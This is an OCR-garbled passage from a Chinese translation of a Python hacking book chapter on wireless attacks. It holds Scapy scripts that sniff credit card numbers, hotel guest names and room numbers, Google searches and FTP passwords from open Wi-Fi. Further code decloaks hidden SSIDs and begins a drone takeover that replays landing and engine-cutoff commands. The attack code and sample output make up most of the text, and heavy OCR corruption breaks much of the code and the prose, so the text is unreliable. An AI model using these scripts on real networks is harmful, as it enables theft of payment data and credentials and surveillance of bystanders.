def findCreditCard(pkt): 
raw = pkt.sprintf('%Raw.1load%' ) 
americaRE = re.findall('3[47][0-9]{13}', raw) 
masterRE = re.findall('5[1-5][0-9]{14}', raw) 
visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw) 
if americaRE: 
print('[+] Found American Express Card: ' + americaRE[0]) 
if masterRE: 
print('[+] Found MasterCard Card: ' + masterRE[0]) 
if visaRE: 
print('[+] Found Visa Card: ' + visaRE[0]) 


‘ D 


现在 我 们 必须 从 嗅 探 到 的 无 线 数据 包 中 匹配 正则 表达 式 。 请 记 住 我 们 使 用 混杂 模式 
嗅 探 的 目的 ， 因 为 它 允 许 我 们 观察 不 管 是 不 是 给 我 们 的 数据 包 。 为 了 解析 我 们 截获 
的 无 线 数据 包 ， 我 们 使 用 Scapy 库 。 注 意 ， 我 们 使 用 sniff() 4 

数 ， sniff) 函数 将 每 一 个 经 过 的 数据 包 作为 参数 传 给 FindcreditCard() & 
数 。 不 到 25 行 的 Python 代码 ， 我 们 创建 了 一 个 偷 取 信用 卡 信 息 的 小 程序 。 





# coding=UTF-8 

import re 

import optparse 

from scapy.all import * 


def findCreditCard(pkt): 
raw = pkt.sprintf('%Raw.1load%' ) 
americaRE = re.findall('3[47][0-9]{13}', raw) 
masterRE = re.findall('5[1-5][0-9]{14}', raw) 
visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw) 
if americaRE: 
print('[+] Found American Express Card: ' + americaRE[0]) 
if masterRE: 
print('[+] Found MasterCard Card: ' + masterRE[0]) 
if visaRE: 
print('[+] Found Visa Card: ' + visaRE[0]) 


def main(): 
parser = optparse.OptionParser('usage % prog -i<interface>' ) 
parser.add_option('-i', dest='interface', type='string', help= 
(options, args) = parser.parse_args() 
if options.interface == None: 
print parser.usage 
exit (0) 
else: 
conf.iface = options.interface 
try: 
print('[*] Starting Credit Card Sniffer.') 
sniff (filter='tcp', prn=findCreditCard, store=0) 
except KeyboardiInterrupt: 
exit(0) 
if _name__ == '__main_': 
main() 


SSS 
显然 ， 我 们 不 打算 盗 取 任何 人 的 信用 卡 数 据 。 事 实 上 ， 这 个 攻击 的 无 线 黑 客 小 偷 被 
关 了 20 年 。 但 是 希望 你 意识 到 这 种 攻击 相对 比较 交 单 没有 一 般 人 为 的 那么 复杂 。 在 


下 一 节 中 ， 我 们 将 演示 一 个 单独 的 情景 ， 我 们 将 攻击 一 个 未 加 密 的 无 线 网 络 并 盗 取 
私人 信 we 2 





噢 探 旅馆 客人 


大 多 数 旅 馆 提供 公开 的 无 线 网 络 。 通 常 这 些 网 络 没 有 加 密 也 缺乏 任何 企业 忍 着 或 者 
加 密 控 制 。 本 节 将 验证 ， 及 行 Python 代 码 就 能 渗透 利用 这 个 情况 ， 导 致 灾难 性 的 公 
共 信 息 泄 露 。 最近 ， 我 采 在 一 家 提供 无 线 连接 的 旅馆 当 客 人 。 当 连接 到 无 线 网 络 之 
后 ， 我 的 浏览 器 指向 一 个 网 页 要 求 登 陆 这 个 网 络 。 网 络 赁 证 包含 我 的 姓名 和 房间 
号 ， 提 供 此 信息 后 ， 我 的 浏览 器 发 布 了 一 个 未 加 密 的 HTTP 页 面 返回 到 服务 器 接受 
认证 Cookie。 检 查 这 个 初始 的 HTTP 提 交 ， 显 示 了 一 些 有 趣 的 东西 。 


我 注意 到 一 个 字符 

串 PROVIDED_LAST_NAME=OCONNOR&PROVIDED_ROOM_NUMBER=1337 ° 明文 传输 到 
旅馆 服务 器 的 包含 我 的 姓名 和 房间 号 码 。 服 务 器 没有 试图 保护 这 些 信息 ， 我 的 浏览 
器 简单 的 发 送 这 些 透 明 的 信息 。 对 于 这 个 特殊 的 酒店 ， 客 户 的 姓名 和 房间 号 被 用 来 
点 餐 ， 按 摩 服务 甚至 是 购买 礼品 ， 所 以 你 可 以 想到 酒店 的 客户 不 想 黑 客 得 到 他 们 的 
私人 信息 2 


POST /common_ip_cgi/hn_seachange.cgi HTTP/1.1 

Host: 10.10.13.37 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_1) 
AppleWebKit/534.48.3 (KHTML, like Gecko) Version/5.1 Safari/534.48 
Content-Length: 128 

Accept: text/html, application/xhtml+xml, application/ 

xml; q=0.9,*/*;q=0.8 

Origin:http://10.10.10.1 

DNT: 1 

Referer:http://10.10.10.1/common_ip_cgi/hn_seachange.cgi 
Content-Type: application/x-www-form-urlencoded 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

Connection: keep-alive 

SESSION_ID= deadbeef123456789abcdef1234567890 &amp; RETURN_ 
MODE=4&amp ; VALIDATION_FLAG=1&amp ; PROVIDED_LAST_NAME=OCONNOR&amp ; PR 
NUMBER=1337 





我 们 现在 可 以 使 用 Python 从 酒店 用 户 哪 里 捕获 信息 。 开 始 是 一 个 很 简单 的 Python 嗅 
探 器 。 首 先 ， 我 们 将 确认 我 们 捕获 流量 的 接口 ， 接 着 ， 我 们 用 sniff() BAAR 
监听 流量 ， 注 意 这 个 函数 过 滤 ， 只 监听 TCP 流 量 数 据 包 ， 我 们 将 函数 命令 

为 findGuest() 。 


conf.iface = "mono" 
try: 
print "[*] Starting Hotel Guest Sniffer." 
sniff(filter="tcp", prn=findGuest, store=0) 
except KeyboardInterrupt: 
exit(0) 


4 findGuest 函数 接收 到 数据 包 ， 它 将 确认 拦截 的 数据 包 是 否 包含 任何 私人 信 
息 。 首 先 它 复制 原始 数据 到 变量 r aw 中， 然后 我 们 建立 一 个 正则 表达 式 来 解析 姓名 
和 客人 的 房间 号 码 。 注 意 我 们 的 正则 表达 式 接受 任何 以 LAST_NAME 开始 的 字符 
串 ， 和 一 个 终止 符号 & 。 正 则 表达 式 为 了 酒店 号 码 捕 获 任何 以 ROOM_NUMBER 开 
头 的 字符 串 。 


def findGuest(pkt): 


raw = pkt.sprintf("%Raw. load%" ) 
name=re.findall("(?1)LAST_NAME=(.*)&amp;", raw) 
room=re.findall("(?1i)ROOM_NUMBER=(.*)'", raw) 
if name: 

print("[+] Found Hotel Guest "+str(name[0]) + ", Room #" + 


es 








将 所 有 的 放 在 一 起 ， 我 们 现在 有 一 个 无 线 网 络 噢 探 器 捕获 任何 连接 到 这 个 酒店 无 线 
网 络 上 的 客户 的 姓名 和 房间 号 。 请 注意 ， 为 了 有 了 嗅 探 流量 和 分 析 数 据 包 的 能 力 ， 我 
们 需要 导入 Scapy 库 。 


# coding=UTF-8 
Import optparse 
from scapy.all import * 


def findGuest(pkt): 


def 


raw = pkt.sprintf("%Raw. load%" ) 
name=re.findall("(?1)LAST_NAME=(.*)&amp;", raw) 
room=re.findall("(?i)ROOM_NUMBER=(.*)'", raw) 
if name: 

print("[+] Found Hotel Guest "+str(name[0]) + ", Room #" + 


main(): 
parser = optparse.OptionParser('usage %prog -i<interface>' ) 
parser.add_option('-i', dest='interface', type='string', help= 
(options, args) = parser.parse_args() 
if options.interface == None: 
print(parser.usage) 
exit (0) 
else: 
conf.iface = options.interface 
try: 


print('[*] Starting Hotel Guest Sniffer.') 

sniff(filter='tcp', prn=findGuest, store=0) 
except KeyboardiInterrupt: 

exit(0) 


if name == ' main ~“: 


[E E 


main() 





运行 我 们 的 酒店 嗅 探 程序 ， 我 们 可 以 看 到 黑客 是 怎样 确认 酒店 住 了 那些 人 的 。 


attacker# python hotelSniff.py -i wlano 


[*] 
[+] 
[+] 
[+] 


Starting Hotel Guest Sniffer. 

Found Hotel Guest MOORE, Room #1337 

Found Hotel Guest VASKOVICH, Room #1984 
Found Hotel Guest BAGGETT, Room #43434343 


我 应 该 有 足够 的 强调 ， 收 集 个 人 信息 已 经 违反 了 一 些 州 ， 国 家 的 法 律 。 在 下 一 节 ， 
我 们 将 进一步 扩大 我 们 噢 探 无 线 网 络 的 能 力 ， 通 过 解析 Google 搜 索 。 


构建 Google 无 线 搜 索 记 录 器 


你 可 能 注意 到 Google 搜 索引 擎 提供 接近 即时 的 反馈 ， 当 你 在 搜索 框 中 输入 时 。 取 决 
于 你 连接 网 络 的 速度 ， 你 的 浏览 器 会 发 送 一 个 HTTP GET 请 求 几乎 在 你 每 输入 一 个 
字符 到 搜索 框 中 时 。 检 查 下 面 到 Google 的 HTTP GET 请 求 ， 当 我 搜索 字符 

串 "what is the meaning of life?" 时 ， 请 注意 ， 搜 索 以 q= 我 的 字符 串 开 
始 ， 然 后 以 & 结束 pq= 跟着 以 前 的 搜索 。 


GET 
/s?hl=en&amp;cp=27&amp;gs_id=58&amp;xhr=t&amp;q=what%20is%20the%20r 
Host: www.google.com 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_2) 
AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 
Safari/534.51.22 

< T SNIPPED .> 


q= Query, what was typed in the search box 

pq= Previous query, the query prior to the current Sear( 
h1l= Language, default en[glish] defaults, but try xx-hé 
as_epq= Exact phrase 

as_filetype= File format, restrict to a specific file type suc 
as_sitesearch= Restrict to a specific site such as www.2600.com 





有 了 Google 搜 索引 警 的 知识 在 手 ， 让 我 们 快速 构建 一 个 无 线 数 据 包 嗅 探 器 ， 实 时 打 
印 我 们 拦截 到 的 他 们 搜索 的 东西 。 这 一 次 我 们 将 使 用 函数 findGoogle() A% 
探 的 数据 包 。 这 里 我 们 将 复制 数据 包 的 内 容 数据 到 payload 变量 ， 如 果 这 

个 payload 包含 HTTP GET 我 们 就 能 构建 一 个 正则 表达 式 找到 当前 Google 的 搜索 
字符 串 。 最 后 我 们 将 清除 结果 字符 串 ，HTTP URL 不 能 包含 任何 空格 字符 。 为 了 避 
免 这 个 问题 ， 我 们 的 浏览 器 将 编码 空格 为 + 或 者 %20， 在 URL 中 。 为 了 正确 的 转换 
这 些 信息 ， 我 们 必须 解码 任何 + 或 者 %20 为 空格 。 


def findGoogle(pkt): 
if pkt.haslayer(Raw): 
payload = pkt.getlayer(Raw).load 
if 'GET' in payload: 
if 'google' in payload: 
r = re.findall(r'(?1)\&amp;q=(.*?)\&amp;', payload 
a ee 
search = r[0].split('&amp;')[0] 
search = search.replace('q=', '').replace('t', 
print('[+] Searched For: ' + search) 


: — 








将 我 们 整个 Google 嗅 探 器 的 脚本 放 在 一 起 ， 我 们 现在 可 以 看 到 他 们 搜索 过 的 
Google 内 容 。 请 注意 ， 我 们 现在 可 以 使 用 sniff() 函数 过 滤 只 要 TCP 80 端 口 的 流 
量 。 虽 然 Google 提 供 发 送 在 443 端 口 HTTPS 的 流量 的 能 力 ， 捕 获 这 个 流量 事 没有 用 
的 ， 因 为 是 加 密 的 。 因 此 我 们 只 捕获 80 端 口 的 HTTP 流 量 。 


# coding=UTF-8 
import optparse 
from scapy.all import * 


def findGoogle(pkt): 
if pkt.haslayer(Raw): 
payload = pkt.getlayer(Raw).load 
if 'GET' in payload: 
if 'google' in payload: 
r = re.findall(r'(?1i1)\&amp;gq=(.*?)\&amp;', payload 
dite ire 
search = r[0].split('&amp;')[0] 
search = search.replace('q=', '').replace('+', 
print('[+] Searched For: ' + search) 


def main(): 
parser = optparse.OptionParser('usage %prog -i <interface>' ) 
parser.add_option('-i', dest='interface', type='string', help= 
(options, args) = parser.parse_args() 
if options.interface == None: 
print parser.usage 
exit (0) 
else: 
try: 
conf.iface = options.interface 
print('[*] Starting Google Sniffer.') 
sniff(filter='tcp port 80', prn=findGoogle) 
except KeyboardiInterrupt: 
exit(0) 


if name == '_main_': 
main() 


Ea SS 





在 使 用 未 加 密 的 网 络 连接 中 运行 我 们 的 脚本 ， 我 们 可 以 看 到 别人 的 搜索 内 容 。 拦 截 
Google 流 量 可 能 有 点 令 人 为 难 ， 下 一 节 ， 拦 截 用 户 的 凭据 的 手段 更 加 能 证 明 一 个 组 
织 的 安全 局 势 。 


attacker# python googleSniff.py -i mono 
[*] Starting Google Sniffer. 

[+] W 

[+] What 

[+] What is 

[+] What is the mean 

[+] What is the meaning of life? 


Google URL 搜 索 参 数 


Google URL 搜 索 参 数 提供 了 许多 有 价值 的 


额外 信息 ， 这 些 信 息 对 建立 你 的 Google 搜 索 记 录 器 很 有 用 。 解 析出 的 查询 ， 先 前 查 
OD en ee a te le 
器 。 更 多 信息 请 到 : http://www.google.com/cse/docs/resultsxml.html 


噢 探 FTP 认 证 


FTP 协 议 缺 乏 任 何 的 加 密 算 法 来 保护 用 户 认 证 。 黑 客 能 轻松 的 拦截 这 些 任何 当 受 害 
Be e 的 网 络 。 看 下 面 的 tcpdump ee ia TE ° FTPH ix 
3A et A RAR ETE © 


attacker# tcpdump -A -i monO 'tcp port 21' 

Ban Ca OO CO R= feel ares are ere 

20:54:58.388129 IP 192.168.95.128.42653 > 192.168.211.1.ftp: 
Flags [P.], seq 1:17, ack 63, win 14600, length 16 
ETS OV Oe Ulin. sana 二 二 过 R-S [eR eo aoe USER root 
20:54:58.388933 IP 192.168.95.128.42653 > 192.168.211.1.ftp: 
Flags [.], ack 112, win 14600, length 0 

Ee (CO Ua Gl niger are heer arrerra Rea. | PaO. iw sa 

20:55:00.732327 IP 192.168.95.128.42653 > 192.168.211.1.ftp: 
Flags [P.], seq 17:33, ack 112, win 14600, length 16 
Beer tO AGC nee eee eer Ri PO PASS secret 


AT 42 MRR ETE > RATS PER FH o AP EH BL SUSERESA BR 
是 用 户 名 ， 第 二 个 字符 串 是 PASS 接着 就 是 密码 。 我 们 在 tcpdump 的 数据 中 看 到 这 
些 赁 证 。 我 们 将 设计 两 个 正则 表达 式 来 捕获 这 些 信息 。 我 们 也 将 从 数据 包 中 璋 离 IP 
地 址 。 不 知道 服务 器 的 |P 地 址 用 户 名 和 密码 是 毫 无 价值 的 。 


from scapy.all import * 


def ftpSniff(pkt): 
dest = pkt.getlayer(IP).dst 
raw = pkt.sprintf('%Raw.1load%' ) 
user = re.findall('(?1)USER (.*)', raw) 
pswd = re.findall('(?1)PASS (.*)', raw) 


if user: 
print('[*] Detected FTP Login to ' + str(dest)) 
print('[+] User account: ' + str(user[0])) 

elif pswd: 


print('[+] Password: ' + str(pswd[0]) ) 


将 所 有 的 脚本 放 在 一 起 ， 我 们 只 噢 探 21 端 口 的 TCP 流 量 。 我 们 还 添加 一 些 选项 来 选 
择 嗅 探 器 使 用 的 网 络 适配器 。 运 行 这 个 脚本 允许 我 们 拦截 FTP 登 陆 赁 证 。 


# coding=UTF-8 
Import optparse 
from scapy.all import * 


def ftpSniff(pkt): 
dest = pkt.getlayer(IP).dst 
raw = pkt.sprintf('%Raw.1load%' ) 
user = re.findall('(?1)USER (.*)', raw) 
pswd = re.findall('(?1)PASS (.*)', raw) 


if user: 
print('[*] Detected FIP Login to ' + str(dest)) 
print('[+] User account: ' + str(user[0])) 

elif pswd: 


print('[+] Password: ' + str(pswd[0]) ) 


def main(): 
parser = optparse.OptionParser('usage %prog -i<interface>' ) 
parser.add_option('-i', dest='interface', type='string', help= 
(options, args) = parser.parse_args() 


if options.interface == None: 
print parser.usage 
exit (0) 

else: 
conf.iface = options.interface 
try: 


sniff(filter='tcp port 21', prn=ftpSniff) 
except KeyboardInterrupt: 
exit(0) 
if _name == '_ main_': 
main() 








运行 我 们 的 脚本 ， 我 们 检测 到 一 个 登陆 的 FTP 服 务 器 ， 并 显示 用 户 的 凭证 和 登陆 的 
服务 器 。 我 们 现在 有 一 个 少 于 30 行 Python 代码 的 FTP 和 凭证 噢 探 器 。 当 用 户 的 证 书 可 
以 为 我 们 提供 对 网 络 的 访问 ， 在 下 一 节 中 ， 我 们 将 使 用 无 线 监听 探测 用 户 的 历史 记 


attacker:~# python ftp-sniff.py -i mono 
[*] Detected FTP Login to 192.168.211.1 
[+] User account: root\r\n 

[+] Password: secret\r\n 


你 的 笔记 本 去 过 哪 ? Python 解答 


几 年 前 我 教 了 一 个 无 无 线 安 全 的 课程 ， 为 了 让 学 生 听 讲 我 关闭 了 房间 里 的 无 线 网 
络 ， 也 是 为 了 防止 他 们 攻击 任何 的 受害 者 。 我 以 无 线 网 络 扫描 的 演示 作为 课程 的 开 
始 ， 发 现 了 一 些 有 趣 的 东西 ， 在 房间 里 探测 到 几 个 客户 端 试图 连接 的 首选 网 络 。 一 
个 特别 的 学 生 刚 从 洛杉矶 回来 ， 他 的 电脑 探测 到 LAX_Wireless 和 Hooters_WiFi 

， 我 开 了 一 个 玩笑 ， 问 学 生 在 Hooters Restaurant 的 停留 是 否 满意 。 他 很 惊讶 ， 我 
怎么 知道 这 些 信息 ? 监听 802.11 探 测 请 求 ! 


为 了 提供 一 个 无 缝 的 连接 ， 你 的 电脑 和 手机 经 常 保持 一 个 首选 的 网 络 列 表 ， 其 中 包 
括 你 先前 成 功 连接 过 的 无 线 网络 名 称 。 当 你 的 电脑 开机 或 者 网 络 断 开 后 ， 你 的 电脑 
经 常 发 送 802.11 探 测 请 求 搜索 列表 中 的 每 一 个 网 络 名 称 。 让 我 们 快速 的 编写 一 个 检 
测 802.11 网 络 请 求 的 工具 。 在 这 个 例子 中 ， 我 们 称呼 我 们 处 理 数据 包 的 函数 

为 sniffProbe() 。 注 意 ， 我 们 将 整理 出 802.11 探 测 请 求 通过 检测 数据 包 是 

否 haslayer(Dot11ProbeReq) 。 如 果 请 求 包含 新 的 网 络 名 称 我 们 将 打印 他 们 在 屏 
幕 上 。 


from scapy.all import * 


"mono' 


[] 


def sniffProbe(p): 
if p.haslayer(Dot11ProbeReq): 
netName = p.getlayer(Dot11ProbeReq).info 
if netName not in probeReqs: 
probeReqs.append(netName ) 
print('[+] Detected New Probe Request: ' + netName) 
sniff(iface=interface, prn=sniffProbe) 


interface 
probeReqs 


现在 我 们 可 以 运行 我 们 的 脚本 看 看 来 自 附近 电脑 或 者 手机 的 探测 请 求 。 这 允许 我 们 
看 到 客户 机 的 首选 网 络 列表 。 


attacker:~# python sniffProbes.py 

[+] Detected New Probe Request: LAX_Wireless 

[+] Detected New Probe Request: Hooters_WiFi 

[+] Detected New Probe Request: Phase_2 Consulting 
[+] Detected New Probe Request: McDougall_Pizza 


找到 隐藏 的 802.11 网 络 标识 


ler 
止 他 们 的 网 络 名 称 别 发 现 。802.11 标 识 帧 中 的 字段 通常 包含 网 络 名 称 。 在 隐藏 的 网 
络 中 ， 接 入 点 的 这 个 字段 为 空白 ， sD Ue ois rs ea 但 是 我 们 只 
能 搜索 到 空白 字段 的 802.11 标 识 帧 。 在 下 面 的 例子 中 ， 我 们 将 寻找 这 些 帧 并 打印 出 
这 些 接 入 点 的 MAC 地 址 。 


def sniffDot11(p): 
if p.haslayer (DotiiBeacon): 
if p.getlayer(DotiiBeacon).info == '': 
addr2 = p.getlayer(Doti1).addr2 
if addr2 not in hiddenNets: 
print('[-] Detected Hidden SSID: with MAC:' + addr: 


剧本 


没有 隐藏 的 802.11 网 络 


当 接 入 点 离开 断 开 隐藏 的 网 络 ， 它 将 发 送 名 称 在 探测 响应 中 。 一 个 探测 响应 通常 发 
生 在 客户 端 发 送 的 探测 请 求 。 为 了 发 现 隐藏 的 名 字 ， 我 们 必须 等 待 一 个 探测 响应 匹 
配 我 们 802.11 标 识 帧 中 的 MAC 地 址 。 我 们 将 两 个 小 的 数组 加 到 我 们 的 e 
起 使 用 。 首 先 ， hiddenNets ， 跟 踪 我 们 看 到 的 隐藏 网 络 的 MAC 地 址 。 

=> unhiddenNets ， 追 踪 已 经 公开 的 网 络 ， ee Sere 11 标 识 
帧 时 ， 我 们 将 他 家 到 我 们 的 隐藏 网 络 数 组 。 当 我 们 检测 到 802.11 探 测 响应 时 ， 我 们 
将 抽取 网 络 名称 。 a eure! hiddenNets 数组 看 看 是 否 包 含 这 些 值 ， 确 

保 unhiddenNets 不 包含 这 些 值 。 如 果 情 况 属实 ， 我 们 可 以 解析 网 络 名 称 并 打印 
在 屏幕 上 。 





# coding=UTF-8 
import sys 
from scapy.all import * 


interface = 'mono' 
hiddenNets = [] 
unhiddenNets = [] 


def sniffDoti1(p): 
if p.haslayer(DotiiProbeResp): 
addr2 = p.getlayer(Doti1).addr2 
if (addr2 in hiddenNets) &amp; (addr2 not in unhiddenNets) 
netName = p.getlayer(Dot11ProbeResp).info 
print '[+] Decloaked Hidden SSID: ' + netName + ' for I 
unhiddenNets.append(addr2) 
if p.haslayer(Doti1iBeacon) : 
if p.getlayer(DotiiBeacon).info == '': 
addr2 = p.getlayer(Doti1).addr2 
if addr2 not in hiddenNets: 
print '[-] Detected Hidden SSID: ' + ‘with MAC:' + 
hiddenNets.append(addr2) 
sniff(iface=interface, prn=sniffDoti1) 


运行 我 们 的 脚本 ， 它 正确 的 识别 了 一 些 隐藏 的 网 络 和 公开 的 网 络 ， 不 到 30 行 代码 ， 


他 令 人 兴奋 了 |! 在 下 一 节 中 ， 我 们 将 转换 积极 的 无 线 攻 击 ， 换 就 话说 就 是 伪造 数据 
包 接 管 无 人 机 。 





attacker:~# python sniffHidden.py 
[-] Detected Hidden SSID with MAC: 00:DE:AD:BE:EF:01 
[+] Decloaked Hidden SSID: Secret-Net for MAC: 00:DE:AD:BE:EF:01 


用 Python 拦截 和 监视 无 人 机 


在 2009 年 的 夏天 ， 美 军 在 伊拉克 注意 到 一 些 有 趣 的 事 。 当 美军 收集 叛乱 者 的 笔记 本 
时 ， 美 军 发 现 他 们 的 电脑 上 有 美军 的 无 人 机 视频 。 笔 记 本 显示 美军 的 无 人 机 被 叛乱 
者 劫持 了 数 百 个 小 时 。 经 过 进一步 的 调查 ， 情 报 人 员 发 现 叛乱 者 使 用 价值 26 美 元 的 
软件 SkyGrabber 拦 截 了 无 人 机 。 更 令 他 们 惊 证 的 是 ， 空 军 的 无 人 机 程序 发 送 到 地 面 
控制 中 心 的 视频 没有 加 密 。SkyGrabber 软 件 通常 用 来 拦截 未 加 密 的 卫星 电视 数据 。 
甚至 不 需要 任何 配置 就 可 以 拦截 美军 无 人 机 视频 © 


攻击 美军 的 无 人 机 违反 了 美国 的 爱国 者 法 案 ， 所 以 让 我 们 找 一 些 不 违法 的 目标 攻 
击 。Parrot Ar.Drone 的 无 人 机 是 一 个 良好 的 目标 ， 一 个 开源 的 基于 Linux 的 无 人 机 ， 
它 允 许 iPhone/lpad 应 用 程序 通过 未 加 密 的 WIFI 控 制 无 人 机 。 价 格 300 美 元 ， 一 个 业 
余 爱 好 者 可 以 从 http://ardrone.parrot.com/ 购买 无 人 机 。 用 我 们 已 经 知道 的 工具 ， 
我 们 可 以 控制 我 们 的 目标 无 人 机 。 


拦截 流量 ， 检 测 协 议 


让 我 们 先 了 解 无 人 机 和 iPhone 如 何 通 讯 。 将 无 线 适 配器 设置 到 混杂 模式 ， 我 们 要 学 
习 无 人 机 和 iPhone 之 间 如 何 通过 WIFI 网 络 建立 连接 。 阅 读 无 人 机 知道 之 后 ， 我 们 知 
道 MAC 过 滤 是 唯一 保护 连接 的 安全 机 制 。 只 有 配对 的 iPhone 才能 对 无 人 机 发 送 指 
令 。 为 了 接管 无 人 机 ， 我 们 需要 学 习 指 令 的 协议 ， 然 后 重新 发 送 这 些 指令 。 首先 ， 
我 们 将 我 们 的 无 线 适 配器 设置 为 混杂 模式 监听 流量 ， 一 个 快速 的 tcpdump 显示 流 
量 来 自 onc ce 5555 端 口 。 快 速 分 析 后 ， 可 以 推测 这 流量 包含 

了 无 人 机 视频 下 载 ， 因 为 有 大 量 的 数据 朝 同一 方向 。 相 反 ， 导 航 命令 似乎 从 
iPhone 的 UDP 5556 端 口 发 送 。 


attacker# airmon-ng start wlanO 
Interface Chipset Driver 
wlan0 Ralink RT2870/3070 rt2800usb - [phy0] 

(monitor mode enabled on mon0) 
attacker# tcpdump-nn-1i mono 
16:03:38.812521 54.0 Mb/s 2437 MHz 11g -59dB signal antenna 1 [bit 
IP 192.168.1.2.5556 > 192.168.1.1.5556: UDP, length 106 
16:03:38.839881 54.0 Mb/s 2437 MHz 11g -57dB signal antenna 1 [bit 
IP 192.168.1.2.5556 > 192.168.1.1.5556: UDP, length 64 
16:03:38.840414 54.0 Mb/s 2437 MHz 11g -53dB signal antenna 1 [bit 
IP 192.168.1.1.5555 > 192.168.1.2.5555: UDP, length 25824 





知道 iPhone 通过 UDP 5556 端 口 发 送 指令 控制 无 人 机 ， 我 们 建立 一 个 小 的 Python 脚 
本 来 解析 导航 命令 。 请 注意 ， 我 们 的 脚本 打印 原始 的 UDP 5556 的 导航 数据 。 


from scapy.all import * 


NAVPORT = 5556 
def printPkt(pkt): 
if pkt.haslayer(UDP) and pkt.getlayer(UDP).dport == NAVPORT: 
raw = pkt.sprintf('%Raw.1load%' ) 
print raw 
conf.iface = 'mono' 
sniff (prn=printPkt ) 


j 这 个 脚本 给 我 们 看 看 无 人 机 的 指令 协议 。 我 们 看 到 协议 使 用 的 语 
AT*CMD*=SEQUENCE_NUMBER, VALUE, [VALUE{3}] ° ERREN 的 流量 ， 我 
1 这 将 会 被 我 们 的 攻击 所 利用 。 命 

AT*REF=$SEQ, 290717696\r 是 发 送 无 人 家 降落 的 命令 。 其 次 ， 命 
AT*REF=$SEQ, 290717952\r 发 送 一 个 紧急 降落 的 命令 ， 立 即 切断 引擎 。 命 
AT*REF=SEQ, 290718208\r 发 送 给 无 人 机 一 个 起 飞 指 令 。 最 后 ， 我 们 可 以 用 命 
令 AT*PCMD=SEQ, Left —Right_ Tilt, Front_Back_Tilt, Vertical_Speed, Angt 
来 控制 无 人 机 。 我 们 现在 知道 首 足够 的 指令 来 攻击 无 人 机 了 © 


a i 
á >- 


A> A> A> A> 


attacker# python uav-sniff.py 

'AT*REF=11543, 290718208\r ' 
'AT*PCMD=11542,1, -1364309249, 988654145, 1065353216, 0\r' 
'AT*REF=11543, 290718208\r' 

'AT*PCMD=11544, 1, -1358634437, 993342234, 1065353216, O\rAT*PCMD=11545, 
1355121202, 998132864, 1065353216, O\r' 

'AT*REF=11546, 290718208\r ' 

<..SNIPPED. .> 








我 们 开始 创建 一 个 Python 类 interceptThread ， 这 个 类 用 于 储存 我 们 攻击 的 字 
段 。 这 些 字 段 包 含 在 刚才 截获 的 数据 包 里 ， 具 体 的 无 人 机 序列 号 ， 和 最 后 一 个 描述 
无 人 机 流量 是 否 被 截获 的 布尔 值 。 初 始 化 这 些 字段 后 ， ， 我 们 将 创建 两 个 函 

数 run() 和 interceptPkt() > run() HAI 4 RIR et 18495556 UDP 流 量 ， 
并 触发 interceptPkt() oh 当 拦 截 到 无 人 机 流量 ， 布 尔 值 变 为 真 ， 接 下 来 ， 
它 将 从 当前 记录 的 无 人 机 控制 流量 中 玻璃 序列 号 。 


class interceptThread(threading. Thread): 
def _ init (self): 
threading.Thread._ init__(self) 
self.curPkt = None 
self.seq = 
self .foundUAV = False 
def run(self): 
sniff(prn=self.interceptPkt, filter='udp port 5556') 
def interceptPkt(self, pkt): 
if self.foundUAV == False: 
print('[*] UAV Found.') 
self .foundUAV = True 
self.curPkt = pkt 
raw = pkt.sprintf('%Raw.1load%' ) 


try: 

self.seq = int(raw.split(',')[0].split('=')[-1]) + 5 
except: 

self.seq = 0 


A Scapy #] £802.11 2c4e W 


接 下 来 ， 我 们 要 制作 一 个 包含 无 人 机 指令 的 新 的 数据 包 。 然 而 ， 为 了 做 到 这 一 点 ， 
我 们 需要 共 当 前 的 数据 帧 中 复制 一 些 必要 的 信息 。 因为 数据 包 包 含 RadioTap， 
802.11, SNAP, LLC, IP, and UDP 层 ， 我 们 需要 从 各 个 层 中 复制 字段 。 Scapy 对 每 
一 层 都 有 很 好 的 支持 ， 例 如 ， 看 看 Dot11 层 ， 我 们 开始 Scapy 然后 执 

行 ls(Dot11) 命令 ， 我 们 会 看 到 我 们 需要 复制 到 我 们 伪造 的 数据 包 中 的 字段 。 


attacker# scapy 
Welcome to Scapy (2.1.0) 


>>>l1s(Doti1) 

subtype : BitField = (0) 
type : BitEnumField = (0) 
proto : BitField = (0) 
FCfield : FlagsField = (0) 
ID : ShortField = (0) 


addri : MACField 

addr2 : DotiiAddr2MACField 
addr3 : DotiiAddr3MACField 
SCH 
addr4 : DotiiAddr4MACField 


('00:00:00:00:00:00') 
('00:00:00:00:00:00' ) 
('00:00:00:00:00:00' ) 
(0) 

('00:00:00:00:00:00' ) 


Dot11SCField 


我 们 建立 我 们 的 新 的 数据 包 ， 复 制 RadioTap, 802.11, SNAP, LLC, IP 和 UDP 的 没 一 
层 的 协议 。 注 意 ， 我 们 在 每 一 层 里 抛弃 一 些 字 段 ， 比 如 ， 我 们 不 用 复制 |P 地 址 字 
段 。 我 们 的 命令 可 能 包含 不 同 长 度 的 大 小 ， 我 们 可 以 让 Scapy 自动 的 计算 生成 数 


JEB >» 


同样 ， 对 于 一 些 校 验 值 也 是 一 样 。 有 了 这 些 知识 在 手 ， 我 们 现在 可 以 继续 我 


们 的 无 人 机 攻击 了 。 我 们 将 脚本 保存 为 dup.py ， 因 为 它 复制 了 太 多 的 802.11 数 据 
帧 的 字段 。 


from scapy.all import * 


def 


def 


def 


dupRadio(pkt): 

rPkt=pkt.getlayer(RadioTap) 

version=rPkt.version 

pad=rPkt.pad 

present=rPkt.present 

notdecoded=rPkt .notdecoded 

nPkt = RadioTap(version=version, pad=pad, present=present, not 
return nPk 


dupDot11(pkt): 
dPkt=pkt.getlayer(Dot11) 
subtype=dPkt.subtype 
Type=dPkt.type 
proto=dPkt.proto 
FCfield=dPkt.FCfield 
ID=dPkt.ID 
addri=dPkt.addri 
addr2=dPkt.addr2 
addr3=dPkt.addr3 

SC=dPkt .SC 

addr 4=dPkt.addr4 
nPkt=Dot11(subtype=subtype, type=Type, proto=proto, FCfield=FCfie- 
return nPkt 


dupSNAP(pkt): 
sPkt=pkt.getlayer (SNAP) 
oui=sPkt .OUI 

code=sPkt .code 


nPkt=SNAP (OUI=oui, code=code) 
return nPkt 


def dupLLC(pkt): 
1Pkt=pkt.getlayer (LLC) 
